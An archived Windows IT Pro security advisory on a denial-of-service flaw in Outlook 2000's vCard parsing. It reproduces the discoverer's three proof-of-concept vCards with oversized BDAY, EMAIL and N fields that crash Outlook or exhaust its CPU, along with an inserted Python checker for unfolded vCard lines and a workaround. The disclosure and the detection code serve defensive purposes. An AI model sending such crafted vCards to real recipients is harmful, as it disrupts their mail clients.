Windows IT Pro is the leading independent community for IT professionals deploying Microsoft Windows server and client applications and technologies.
  
  


September 01, 2000

vCard Data Under Outlook 2000 Can Cause Denial of Service




Reported August 30, 2000 by
Joel Moses

VERSIONS AFFECTED
  • Microsoft Outlook 2000

DESCRIPTION

Outlook 2000 supports vCard technology, which helps to identify the sender of a given email. vCards are normally sent as file attachments to an email message, where the vCard contains various fields and associated data. Data that exceeds 75 characters in length should be "line folded" (wrapped) to provide a uniform means of interpreting vCard data. RFC 2426 section 2.6 defines the means for line folding; however, Microsoft's implementation does not follow the specification. Due to this oversight, it is possible to cause Outlook 2000 to consume an unreasonably high amount of CPU time or to crash completely. An attack could be launched by sending a vCard that contains long field data.
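A screening check for the folding rule described above, as an added example that is not part of the original advisory or the discoverer's bulletin: it unfolds a vCard as RFC 2426 section 2.6 describes and reports properties whose physical lines exceed 75 characters or whose unfolded value exceeds a size cap. The function names, the MAX_LOGICAL cap and the sample vCard are assumptions constructed for illustration.

```python
"""Screen a vCard for lines that ignore RFC 2426 section 2.6 folding."""

MAX_PHYSICAL = 75    # fold threshold quoted in the advisory
MAX_LOGICAL = 1024   # assumed policy cap on one unfolded value (not from the page)


def unfold(text):
    """Return [(logical_line, longest_physical_length)] for a vCard.

    A line break followed by a single space or tab is a fold: the break and
    that one whitespace character are removed and the rest is appended.
    """
    out = []
    for raw in text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and out:
            line, longest = out[-1]
            out[-1] = (line + raw[1:], max(longest, len(raw)))
        elif raw:
            out.append((raw, len(raw)))
    return out


def screen(text):
    """Return (property, reason) findings; an empty list means nothing flagged."""
    findings = []
    for line, longest in unfold(text):
        name, sep, value = line.partition(":")
        # Drop parameters (";...") and any group prefix ("item1.")
        prop = name.split(";")[0].rpartition(".")[2].upper()
        if not sep:
            # No "name:value" shape: often a continuation that was not folded
            findings.append((line[:20], "malformed"))
            continue
        if longest > MAX_PHYSICAL:
            findings.append((prop, "unfolded"))
        if len(value) > MAX_LOGICAL:
            findings.append((prop, "oversized"))
    return findings


# Constructed sample: NOTE is folded correctly, EMAIL is one 142-character line.
SAMPLE = "\r\n".join([
    "BEGIN:VCARD", "VERSION:3.0", "FN:Example Person",
    "NOTE:" + "a" * 70, " " + "b" * 20,
    "EMAIL:" + "x" * 120 + "@example.invalid",
    "BDAY:1963-09-15", "END:VCARD",
])

if __name__ == "__main__":
    print(screen(SAMPLE))
```

A correctly folded long value passes the physical-line check, so the separate cap on the unfolded value is what bounds the amount of field data handed to the address-book parser.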

DEMONSTRATION

The following fields cause a buffer overflow:

email:
bday; value=date (as low as 52 characters of form YYYY-MM-D(60)

The following fields cause excessive CPU utilization:

name:
nickname:
fn:
title:
title;language=de;value=text:
tel:
tel;

The following examples were provided by the discoverer and are copied verbatim from the discoverer's original bulletin:

Examples
========

The following examples will cause the advertised behavior.

1) A modification of the "bday" field to extend beyond 55 characters.
This example appears to be the smallest amount of text required to
elicit the symptom. This example will cause Outlook 2000 to overflow
and terminate.

BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915130848273492749723947923749273942394792734972394729374927
4982739472937492873
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD

2) A modification of the "e-mail" field with a large amount of text
data masquerading as an e-mail address. This example will cause
Outlook 2000 to overflow and terminate.


BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de.sadsack.nothing.doing.is.an.overflo
.possible.sadsack.not hing.doing.is.an.overflow.possible.



.sadsack.nothing.doing.is.an.overflow.possible.com
REV:20000830T191121Z
END:VCARD

3) A modification of the "N" or "name" field with a large amount of
text will not cause Outlook to terminate, but will increase
Outlook's CPU utilization to 99%.

BEGIN:VCARD
VERSION:2.1
N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger Meister



Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger MeisterBerger MeisterBerger Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD

VENDOR RESPONSE

Microsoft is aware of this problem; however, no response was available at the time of this writing.

To temporarily work around the problem and avoid viewing a vCard digital ID, disassociate the "Digital ID File" type from Outlook's Address Book by using the desktop Explorer. From the View pull-down menu, choose Folder Options. When the dialog is displayed, select the File Types tab and scroll down to select the "Digital ID File" type. Before removing the file type, be sure to record its associated command so that you can restore the file type at a later date when deemed appropriate. To record the command association, select Edit on the main dialog, and then select Edit again on the Edit File Type dialog. The command association will be displayed in the "Application used to perform action" field, where you may copy it for later redefinition.

CREDIT
Discovered by Joel Moses




Reader Comments
Some additional information:

vCards are simply text files that use the .vcf file extension. If you want to change the file type association, look under file types for "vCard file" or, in Windows 2000, vcf file. If you change the association from Outlook to Notepad, you can open the vCard without crashing Outlook and then copy the data into an Outlook contact.

Sue Mosher September 01, 2000


How do I get rid of the problem? Is it an EXE file that needs to be deleted? I deleted the contact name that caused the problem; but when I scroll down through my contact list, it still shuts Outlook down completely. What can I do?

Michelle Paul June 28, 2004

